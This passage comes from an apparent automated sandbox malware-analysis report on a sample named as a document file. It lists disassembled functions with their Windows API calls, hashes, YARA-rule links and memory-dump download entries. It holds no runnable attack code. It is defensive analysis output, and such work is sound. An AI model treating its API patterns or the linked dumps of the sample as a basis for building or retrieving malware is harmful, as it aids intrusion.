                                                        • Instruction ID: 5db4ed1b3c1b639e8723d4a46b8151403b82716b02316aba7c794b5689c0b191
                                                        • Opcode Fuzzy Hash: 17953139e1dde90ac5292262e53218bf8de2ff79e016cc6f33d49b37f4b57c17
                                                        • Instruction Fuzzy Hash: 54219C71600251AFCF309F799C48A6937B5BF453A4F118626F92AC61E0D3789C51CBA0
                                                        Function 0074CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0074CA86
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0074CAB8
                                                        • __itow.LIBCMT ref: 0074CAD0
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0074CAF6
                                                        • __itow.LIBCMT ref: 0074CB07
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 4161aca66d92aa939d5ddc07072b525081a221bc88c8d94ca5b108bc2ccdc2eb
                                                        • Instruction ID: b4b516d2f776a84cd6917e15baad46b54ad8570baf6fe8fc952174fd10fc3aaf
                                                        • Opcode Fuzzy Hash: 4161aca66d92aa939d5ddc07072b525081a221bc88c8d94ca5b108bc2ccdc2eb
                                                        • Instruction Fuzzy Hash: 8521C6B6701608BBDB22EAA88D4BFDE7BB9EF49750F004025F905E7192D7798D45C3A0
                                                        Function 00756D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00713B1E: _wcsncpy.LIBCMT ref: 00713B32
                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00756DBA
                                                        • GetLastError.KERNEL32 ref: 00756DC5
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00756DD9
                                                        • _wcsrchr.LIBCMT ref: 00756DFB
                                                          • Part of subcall function 00756D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00756E31
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                        • String ID:
                                                        • API String ID: 3633006590-0
                                                        • Opcode ID: 94e2a080a14a1cd92cd40eeaca1bfc2c38e5267aec11f2334d1d2e773d4ac4f2
                                                        • Instruction ID: 9c7e0139f2366e99a43a27652a7bb8265e950cd1f04908e5a0503c8a391a465a
                                                        • Opcode Fuzzy Hash: 94e2a080a14a1cd92cd40eeaca1bfc2c38e5267aec11f2334d1d2e773d4ac4f2
                                                        • Instruction Fuzzy Hash: 6421D875B0231896DF246774EC4EAEA336C9F01712FA04556E825C30D2EFA8CE899A54
                                                        Function 00769122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0076ACD3: inet_addr.WS2_32(00000000), ref: 0076ACF5
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00769160
                                                        • WSAGetLastError.WS2_32(00000000), ref: 0076916F
                                                        • connect.WS2_32(00000000,?,00000010), ref: 0076918B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 3701255441-0
                                                        • Opcode ID: f1170e2caa3e2175b148c8672d45acaeed0981c9e1688a518ab04f89b463b8c3
                                                        • Instruction ID: 62992b7d26b10875b92165c917fc1fae6751254d6a14350debcf6c2d6e4b52e7
                                                        • Opcode Fuzzy Hash: f1170e2caa3e2175b148c8672d45acaeed0981c9e1688a518ab04f89b463b8c3
                                                        • Instruction Fuzzy Hash: 84219331200215AFDB14AF68CC99B6E77ADEF49724F148459FD17AB3D2CA78EC028B51
                                                        Function 007689AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 007689CE
                                                        • GetForegroundWindow.USER32 ref: 007689E5
                                                        • GetDC.USER32(00000000), ref: 00768A21
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00768A2D
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00768A68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 4493a01ed59e9f75bd23cf14f379a468db55bf8422c1f26af716065b81f90471
                                                        • Instruction ID: 3263fba4fd8700142bae1a5b5233e038f366db23ce5fffb7b6f5714edceff544
                                                        • Opcode Fuzzy Hash: 4493a01ed59e9f75bd23cf14f379a468db55bf8422c1f26af716065b81f90471
                                                        • Instruction Fuzzy Hash: BD21A175A00200EFDB10EFA5DC89AAABBF5EF48341F04C479E94A97351DA78AD41CB50
                                                        Function 0072B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0072B5EB
                                                        • SelectObject.GDI32(?,00000000), ref: 0072B5FA
                                                        • BeginPath.GDI32(?), ref: 0072B611
                                                        • SelectObject.GDI32(?,00000000), ref: 0072B63B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 7bd4fcf377c2e72935876093e62e55b50918a1a3e474ce529a08d39343a738d4
                                                        • Instruction ID: 21e45c1e5cfedc69e737e4dda6f8e58b5d2130bdc81bebd5b3557b35b5f5c446
                                                        • Opcode Fuzzy Hash: 7bd4fcf377c2e72935876093e62e55b50918a1a3e474ce529a08d39343a738d4
                                                        • Instruction Fuzzy Hash: BB218B71901358FFDB20DF59ED487A97BF9FB10325F58812BE450961A1C37C8892DB58
                                                        Function 00732E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __calloc_crt.LIBCMT ref: 00732E81
                                                        • CreateThread.KERNEL32(?,?,00732FB7,00000000,?,?), ref: 00732EC5
                                                        • GetLastError.KERNEL32 ref: 00732ECF
                                                        • _free.LIBCMT ref: 00732ED8
                                                        • __dosmaperr.LIBCMT ref: 00732EE3
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 2664167353-0
                                                        • Opcode ID: 38c4f8051ee13f30acd1e82625f16eeb66b00716d265128f17e278a8b6b79cf1
                                                        • Instruction ID: d5896e9e5b95ce90b2c2ede7acc6a141eaa0ee59f2d3364d5fc5827e828b64ee
                                                        • Opcode Fuzzy Hash: 38c4f8051ee13f30acd1e82625f16eeb66b00716d265128f17e278a8b6b79cf1
                                                        • Instruction Fuzzy Hash: 5211C832105706EFF720AFA5DC4ADAB7BA8EF44770F100529F95486153DB39D8028761
                                                        Function 0074B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0074B903
                                                        • GetLastError.KERNEL32(?,0074B3CB,?,?,?), ref: 0074B90D
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,0074B3CB,?,?,?), ref: 0074B91C
                                                        • RtlAllocateHeap.NTDLL(00000000,?,0074B3CB), ref: 0074B923
                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0074B93A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 883493501-0
                                                        • Opcode ID: 9eb6d43eda8a067c12831a7901975176d613fde94d7c5e87701d71675a0c747f
                                                        • Instruction ID: a4038c43d405eb4f1cf26ff9c156811afb80fc8f211f87eda9cb84736a9f0f91
                                                        • Opcode Fuzzy Hash: 9eb6d43eda8a067c12831a7901975176d613fde94d7c5e87701d71675a0c747f
                                                        • Instruction Fuzzy Hash: 45016971241208BFDB214FA9DC88D6B3BADEF8A7A4B10402AF945C2260DB79DC41DA60
                                                        Function 00758355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00758371
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0075837F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00758387
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00758391
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007583CD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 2bbd31d2b10662cda25dfc41a119c9b6245d551aebbac6e84aa93450af368d8f
                                                        • Instruction ID: 4f8743625e4b8c8eb2b17f0de5c9eb45fd54f8fceb29ad10f23e8db143ff6613
                                                        • Opcode Fuzzy Hash: 2bbd31d2b10662cda25dfc41a119c9b6245d551aebbac6e84aa93450af368d8f
                                                        • Instruction Fuzzy Hash: 11018031C0161DDBCF10AFA4EC49AEEBB78FF08B02F014046E901B2150DFB89955C7A6
                                                        Function 0074B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0074B806
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0074B810
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0074B81F
                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0074B826
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0074B83C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 47921759-0
                                                        • Opcode ID: 6842d1a89014fb8da9871759ee5e235b08b19be785b3b4ac8f0be0771e307171
                                                        • Instruction ID: b66d89cf06ff5618be8464acb034041b7d33a66e58a229502ca007a856b062b2
                                                        • Opcode Fuzzy Hash: 6842d1a89014fb8da9871759ee5e235b08b19be785b3b4ac8f0be0771e307171
                                                        • Instruction Fuzzy Hash: 4BF04F75281204AFEB215FA5EC88E773B6CFF46755F00402AF941C7150DB69DC52CAA0
                                                        Function 0074B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0074B7A5
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0074B7AF
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0074B7BE
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0074B7C5
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0074B7DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 47921759-0
                                                        • Opcode ID: 6a0e413c2ee25ab967e830cd68dde6e8be34fc567dfd75f1bdba0b9d5acc3a36
                                                        • Instruction ID: 27c7103676a24e6ecad61a93cb9186dd4d8be15534ad607d03ab0481d9c7cb08
                                                        • Opcode Fuzzy Hash: 6a0e413c2ee25ab967e830cd68dde6e8be34fc567dfd75f1bdba0b9d5acc3a36
                                                        • Instruction Fuzzy Hash: 3DF03C71241208AFEB211FA5AC89E673BACFF86755F10801BF941C6150DB79DC42CA60
                                                        Function 0074FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0074FA8F
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0074FAA6
                                                        • MessageBeep.USER32(00000000), ref: 0074FABE
                                                        • KillTimer.USER32(?,0000040A), ref: 0074FADA
                                                        • EndDialog.USER32(?,00000001), ref: 0074FAF4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 5f3fe0db7ce20cbc0bc4094c0ed917aec007dcf9fe483c5c75abe295434fef26
                                                        • Instruction ID: 3ccb5f789ee739e41cc21c7c7b435e7e053746f8dc6706fc08922ca705b62df1
                                                        • Opcode Fuzzy Hash: 5f3fe0db7ce20cbc0bc4094c0ed917aec007dcf9fe483c5c75abe295434fef26
                                                        • Instruction Fuzzy Hash: 4A018130600704ABEB349B14DD4EBD677B8BB01B09F04816AF287A51E0DBF8AD95CB54
                                                        Function 0072B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 0072B526
                                                        • StrokeAndFillPath.GDI32(?,?,0078F583,00000000,?), ref: 0072B542
                                                        • SelectObject.GDI32(?,00000000), ref: 0072B555
                                                        • DeleteObject.GDI32 ref: 0072B568
                                                        • StrokePath.GDI32(?), ref: 0072B583
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: 9470f14f3a93113693ddea3b13069e9f528330aa915461dc184b8e840510eb59
                                                        • Instruction ID: da82c30cb247bb062ee8b3d5b2e820bea711e8f3c21f3cae78410c675d2ae0e4
                                                        • Opcode Fuzzy Hash: 9470f14f3a93113693ddea3b13069e9f528330aa915461dc184b8e840510eb59
                                                        • Instruction Fuzzy Hash: 86F0C431141348ABDB259F2AED0C7643FF6AB01332F58C216E4A9491F1C73C99A6EF18
                                                        Function 0075FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0075FAB2
                                                        • CoCreateInstance.COMBASE(0079DA7C,00000000,00000001,0079D8EC,?), ref: 0075FACA
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • CoUninitialize.COMBASE ref: 0075FD2D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: 0910b48e4f047378c481a046725fd3f9def7c669ef6d64ef493f97cde17c056f
                                                        • Instruction ID: 3317d9a101e7d3500252271385b477d72e68d95c7f84163bb56d7601ddc82f93
                                                        • Opcode Fuzzy Hash: 0910b48e4f047378c481a046725fd3f9def7c669ef6d64ef493f97cde17c056f
                                                        • Instruction Fuzzy Hash: EBA15C71504305AFC300EF68C895EABB7EDEF88704F40891DF55597192EB74EA4ACBA2
                                                        Function 0075EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007578AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 007578CB
                                                        • CoInitialize.OLE32(00000000), ref: 0075F04D
                                                        • CoCreateInstance.COMBASE(0079DA7C,00000000,00000001,0079D8EC,?), ref: 0075F066
                                                        • CoUninitialize.COMBASE ref: 0075F083
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
